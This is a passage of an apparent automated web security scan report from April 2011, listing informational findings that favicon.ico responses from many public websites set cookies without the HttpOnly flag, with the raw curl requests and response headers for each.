...[SNIP]...

14.143. http://www.mbnanetaccess.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mbnanetaccess.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbnanetaccess.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:57 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com
Set-Cookie: TLTUID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com; Expires=Sat, 02-04-2021 14:07:57 GMT
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

14.144. http://www.medscape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medscape.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:14 GMT
Server: Apache
Last-Modified: Wed, 18 Mar 2009 16:45:47 GMT
ETag: "159eef-37e-465676a5784c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: image/x-icon
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2411a253660;expires=Sat, 02-Apr-11 15:14:14 GMT;path=/

...[SNIP]...

14.145. http://www.merck.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merck.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.merck.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:16 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752756681633; path=/; expires=Sun, 01-Apr-12 13:59:16 GMT
Accept-Ranges: bytes
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Content-Type: text/html
Set-Cookie: BIGipServerwww.merck.com-HTTP=42274988.20480.0000; path=/
Content-Length: 40209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...

14.146. http://www.modelmayhem.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.modelmayhem.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:55 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Tue, 29 Jul 2008 22:05:35 GMT
Connection: keep-alive
Expires: Sun, 03 Apr 2011 13:34:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Set-Cookie: BIGipServermodelmayhem_POOL=1206194348.0.0000; path=/

..............h.......(....... ...........@...............................???.....```..... .........///.............LLL.sss.....WWW.........777.....kkk.........'''.............fff.................++
...[SNIP]...

14.147. http://www.motime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:57:00 GMT
Content-Type: image/x-icon
Content-Length: 3638
Last-Modified: Wed, 30 Mar 2011 10:05:38 GMT
Connection: keep-alive
Set-Cookie: trkdada=x3UsOE2XKyykQj0YA3RgAg==; expires=Sun, 01-Apr-12 13:57:00 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

..............h...&... ..............(....... ...........@...................................fff.............xxx.........................lll...........................................................
...[SNIP]...

14.148. http://www.motortrend.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motortrend.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motortrend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nlyudv55a1nhnnmevhefti2i; path=/; HttpOnly
Set-Cookie: UserPuid=2319845640652462039; domain=motortrend.com; expires=Sat, 02-Apr-2061 13:50:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 414

GIF89a.......\~.2Tr.p1...l..g.....KT[MYa...x..........    Zq~.{..c1EGJ...p..:i.j]O.l.y..IYe...}...f..g    ...~..GYfBYkEMSMW_FWf...N[cp.........p...%Rak]..MW`...cCVZ[.........h..UJBn..n..KZdjQ:...<N_IQXu..~
...[SNIP]...

14.149. http://www.mynewplace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mynewplace.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.7a
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "82870KToCgf"
Last-Modified: Wed, 30 Mar 2011 18:45:34 GMT
Accept-Ranges: bytes
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:57:13 GMT
Set-Cookie: BIGipServerWEB_APPS_SE=2533425674.37663.0000; path=/
Vary: Accept-Encoding, User-Agent

............ .h.......(....... ..... ...........................................v...............................................................w...........s...e...n...V...............................
...[SNIP]...

14.150. http://www.newegg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newegg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 10 Mar 2009 20:58:45 GMT
ETag: "8b266c0c3a1c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 111
X-UA-Compatible: IE=7
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:40:38 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:26 GMT;path=/

..............h.......(....... ...............................RRR.skk.................s....................J..c........c...1..............J...R...............B.........................................
...[SNIP]...

14.151. http://www.nintendo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nintendo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:59 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753939577074; path=/; expires=Thu, 31-Mar-16 14:18:59 GMT; domain=.nintendo.com
Last-Modified: Wed, 22 Jul 2009 17:26:54 GMT
ETag: "2fe8b-e36-46f4ead643380"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 14:18:59 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Content-Type: image/x-icon
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

..............h...&... ..............(....... ...........@........................oh............................. ........;............................................................................
...[SNIP]...

14.152. http://www.nydailynews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:36 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2007 14:31:37 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=14515200
Expires: Sat, 17 Sep 2011 13:23:36 GMT
Keep-Alive: timeout=3, max=998
Content-Type: image/x-icon
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:17 GMT; Path=/

............ .h.......(....... ..... ............................................................................................&...u...uTT..TT..TT..TT..TT..TT..TT..TT..TT..TT.....u...........2......
...[SNIP]...

14.153. http://www.nymag.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nymag.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nymag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:34 GMT
Server: Apache
Location: http://nymag.com/favicon.ico
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerapache_prod_static_pool=1375802028.20480.0000; path=/
Vary: Accept-Encoding
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://nymag.com/favico
...[SNIP]...

14.154. http://www.nytimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nytimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:13 GMT
Content-length: 1406
Content-type: image/x-icon
Set-cookie: RMID=0e1072ee0fa04d9719e1afa7; expires=Sunday, 01-Apr-2012 12:43:13 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 24 Mar 2008 16:03:01 GMT
Etag: "57e-47e7d0b5"
Accept-ranges: bytes

...[SNIP]...

14.155. http://www.officedepot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta h
...[SNIP]...

14.156. http://www.okcupid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okcupid.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okcupid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302
Date: Sat, 02 Apr 2011 13:40:27 GMT
Connection: close
Server: OKWS/3.1.7
Location: http://cdn.okcimg.com/_img/layout2/favicon_new.ico
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="http://www.okcupid.com/w3c/p3p.xml"
Set-Cookie: guest=9282563596558295837; expires=Sun, 01 Apr 2012 13:40:27 GMT; path=/; domain=okcupid.com


14.157. http://www.olivegarden.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olivegarden.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.olivegarden.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:52:33 GMT
Content-Type: image/x-icon
ETag: "0f364036e4c71:0"
Set-Cookie: olive=R3372667923; path=/
Last-Modified: Tue, 21 Aug 2007 21:00:06 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

...[SNIP]...

14.158. http://www.onemanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onemanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="178.190.152.95:AT:Austria"; expires=Sun, 03-Apr-2011 14:01:56 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 5622
Age: 291
X-Cache: HIT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...

14.159. http://www.openforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.openforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 30 Apr 2010 17:36:50 GMT
Accept-Ranges: bytes
ETag: "6fabdb78be8ca1:2cc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 02 Apr 2011 13:39:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/

...[SNIP]...

14.160. http://www.opinionshere.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionshere.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: opinions_here=a500242$50$0$6$140b0403$1021b36; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:33 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.161. http://www.orbitz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orbitz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:10 GMT
ETag: "1536-49f8e1d255180"
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 10:25:05 GMT
Content-Type: image/x-icon
Content-Length: 5430
Server: Apache
Date: Sat, 02 Apr 2011 13:33:53 GMT
Age: 11327
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

...[SNIP]...

14.162. http://www.orchardbank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orchardbank.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orchardbank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:15 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751375.232210; path=/; expires=Tue, 30-Mar-2021 13:36:15 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:15 GMT
Last-modified: Fri, 01 Dec 2006 17:01:18 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000VlMnR6z02I0O5AVHxcS5ZLL:15nk4pqmt; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"

...[SNIP]...

14.163. http://www.outdoorchannel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outdoorchannel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/x-icon
Last-Modified: Wed, 02 Jul 2008 20:47:18 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:27 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=c237f539-f580-4aa1-8e71-f81ce7c34034; expires=Mon, 02-Apr-2012 14:07:27 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:27 GMT; path=/
Content-Length: 1406
Connection: Keep-alive
Via: 1.1 AN-0016020121270012

...[SNIP]...

14.164. http://www.pbs.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pbs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:24 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=92e71d9857c8638d8750a317a271ed51; path=/; domain=.pbs.org
Last-Modified: Thu, 15 Nov 2001 16:43:13 GMT
ETag: "312715-1266-392cefa74aa40"
Accept-Ranges: bytes
Content-Length: 4710
Cache-Control: max-age=10368000
Expires: Sun, 31 Jul 2011 13:35:24 GMT
Content-Type: image/x-icon

...[SNIP]...

14.165. http://www.peekyou.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peekyou.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peekyou.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
ETag: "1502474026"
Last-Modified: Wed, 16 Sep 2009 14:34:27 GMT
Content-Length: 824
Date: Sat, 02 Apr 2011 14:01:04 GMT
Server: lighttpd/1.4.28
Set-Cookie: BIGipServerstatic_files=1694564362.37151.0000; path=/

...[SNIP]...

14.166. http://www.peoplelookup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplelookup.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplelookup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:06 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:33:06 GMT
Cache-Control: public
ETag: 517362157319c18dc38588d213eb5f93004071d8
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-trans=sNP5yw+1/FgqlUufy7qTV8MjXwILd9yCg5LYmkNDfn9g+Q1u/48mAaWTyJDRQ2w82jAxhx4u17Z3Tg==; expires=Sat, 02-Apr-2011 15:03:06 GMT; path=/
Content-Length: 1086

...[SNIP]...

14.167. http://www.pizzahut.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pizzahut.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pizzahut.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 03 Mar 2009 19:15:15 GMT
Accept-Ranges: bytes
ETag: "b14e361349cc91:7d6"
X-Powered-By: ASP.NET
Content-Length: 1150
Cache-Control: max-age=73717
Date: Sat, 02 Apr 2011 13:36:41 GMT
Connection: close
Set-Cookie: WEBTRENDS_ID=6dce8f18f46000006926974d5fc705005eb80000; expires=Thu, 30-Dec-2010 18:50:11 GMT; path=/
Set-Cookie: www-origin=yeti-DC-WASHINGTON-511; path=/; domain=.pizzahut.com
Set-Cookie: www-origin-reset=1; expires=Mon, 02-May-2011 13:36:41 GMT; path=/; domain=.pizzahut.com

...[SNIP]...

14.168. http://www.playlist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:28:05 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Wed, 16 Sep 2009 18:33:08 GMT
Accept-Ranges: bytes
Content-Length: 402
Vary: Accept-Encoding
Set-Cookie: nuid=CgABl02XJGVtzVZFFlaZAg==; expires=Sun, 01-Apr-12 13:28:05 GMT; domain=.playlist.com; path=/

...[SNIP]...

